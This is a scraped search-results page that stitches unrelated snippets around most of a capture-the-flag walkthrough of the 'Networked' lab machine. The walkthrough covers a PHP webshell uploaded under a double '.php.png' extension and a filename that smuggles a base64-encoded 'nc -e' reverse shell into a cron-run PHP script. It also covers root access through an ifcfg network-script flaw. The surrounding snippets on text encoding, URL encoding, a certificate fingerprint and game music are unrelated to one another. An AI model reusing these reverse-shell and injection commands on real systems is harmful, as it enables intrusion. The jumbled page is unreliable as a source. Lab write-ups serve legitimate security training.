Search results
Top results related to e6 b3 a2 e5 85%b0 wikipedia 2
Oct 15, 2015 · 2. It looks like the source text was originally ISO/IEC 8859-1, a standard single-byte extended ASCII encoding. To produce that hex dump, some process misinterpreted the source text as UTF-16LE (a double-byte encoding) and converted it to UTF-8, which is why many programs you've tried interpreted it as UTF-8.
- Recon
- Shell as Apache
- Privesc to Guly
- Privesc to Root
- Beyond Root - Php Misconfiguration
nmap
nmapshows ssh (tcp 22) and http (tcp 80) open: There’s something also going on with 443, as it’s reporting to be closed. Based on the Apache version, Networked is likely Centos 7 or RedHat 7.
Source Code Analysis
The website has four php files, three of which are web pages, and lib.phpwhich is included in others. index.phpis the static page that I saw above.
Intended Functionality
I took at look at the site as it was intended. On /upload.php, there’s a simple form: I created a png real quick, and upload it. The page returns: I’ll jump over to the other page I have from the source, photos.php: I see my image, and if I right-click and select view image, I’m taken to /uploads/10_10_14_5.pngand returned the image.
Create Webshell
I already know from the source how to upload files to Networked. I’ll open my png from earlier in vimand go down a couple lines, and add some php: I can run fileon it to make sure it still matches a mime type of PNG:
Upload Webshell
I could upload my file as shell.png. But on visiting it, I just get back a busted image: That’s because the server isn’t configured to handle .png files with the php interpreter. I spent a long time looking for logic errors in the upload php source that would let me get something named shell.php onto Networking. Then I tried something I knew wouldn’t work, and it did: uploaded as shell.php.png. When I do, it shows as broken in the gallery: When I view /uploads/10_10_14_5.php.png, I see the st...
What? Why?
I was very confused at this point. It turns out this is a configuration error in how the web server is deciding what to execute as code as opposed to return a static file or an image. Details are here. The standard case is that php will only process files ending in .php. The configuration error here means that as long as .php is somewhere in the name it will process as php. I’ll look into the configuration a bit more in Beyond Root.
Enumeration
As apache, I can access the only home directory on the host for guly. There are three files: I can’t access user.txt, but the other two are interesting. crontab.guly shows a config that would run php /home/guly/check_attack.phpevery 3 minutes: check_attack.php is a php script that processes files in the uploadsdirectory: I’m immediately drawn to one line: If I can control $path or $value, there’s obvious code injection. $path is set statically at the top of the file. But $value is not. I’ll o...
Shell Issues
Shells on this box we kind of annoying. This is a good case of remembering to always try to run a shell yourself before trying to get another user’s process to run it. Once I was sure I had a shell that connected back when I ran it, I could use that same command for the privesc. For example, I wanted to have guly run nc -e sh 10.10.14.7 443. This should work, as shis in my path. But it fails: On my listener, I see the connection, and then it immediately dies: So I tested some more shells as a...
Get Shell
Putting that all together, I’ll touch a file that will get a shell: When the script runs, it will loop over the files, and when it runs over mine, it will set $value to a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; band run: Which means it will run: Once the clock hits a minute divisible by three, I get a shell: I’ll also make sure to clean up my file: As guly, I can grab user.txt:
Enumeration
sudo -l(one of the first things I check on any Linux hosts) shows me that guly can run a shell script as root without a password: This script is writing an ifcfg script: The resulting script (ifcft-guly) will run when an interface is brought up. If I run changename.sh, it prompts me for input for several variables, and writes the file out to /etc/sysconfig/network-scripts/ifcfg-guly. It also fails to load the device guly0as it does not exist: But the ifcfg file did write: I ran it again with...
Shell
What I’ve stumbled upon is an error reported on seclists in April. Anything after a space in a value in a network script where the format is VARIABLE=value will be executed. The response to that disclosurewas that anyone who can write that file is basically root anyway, so it doesn’t matter. The regex check at the start of the script prevents me from doing anything too complicated, but it doesn’t prevent me from getting a simple shell: I can now grab root.txt:
In gaining an initial foothold, I uploaded a file 10_10_14_5.php.png, and the webserver treated it as PHP code and ran it. I shared this linkearlier. I wanted to look at the Apache configuration to see how it compared to that in the article. The Apache config files are stored in/etc/httpd/. The main config is /etc/httpd/conf/httpd.conf, but it’s la...
May 12, 2023 · URL 编码是一种将字符转换为可通过因特网传输的格式的方法,它可以解决 URL 只能使用 ASCII 字符集的限制。本文介绍了 URL 编码的原理,规则,示例和应用场景,帮助你更好地理解和使用 URL 编码。如果你对 Web 开发感兴趣,不妨阅读本文,了解 URL 编码的知识。
For trusting your server side certificate, the certificate should be issued by a known and Visa trusted Certificate Authority (CA). Self-signed certificates are not accepted. The following table lists the cerrtifying authorties. f3 73 b3 87 06 5a 28 84 8a f2 f3 4a ce 19 2b dd c7 8e 9c ac.
Aug 20, 2022 · Stage 6 Boss - Yuyuko Saigyouji's Theme: 生死之间花吹雪 Shēngsǐ zhī jiān huā chuīxuě: Storm of Flower Petals Between Life and Death: 原曲:幽雅に咲かせ、墨染の桜 ~ Border of Life
May 24, 2021 · (2) mere information about facts or happenings; and (3) calendars, numerical tables and forms of general use, and formulas. Flag of the People's Republic of China
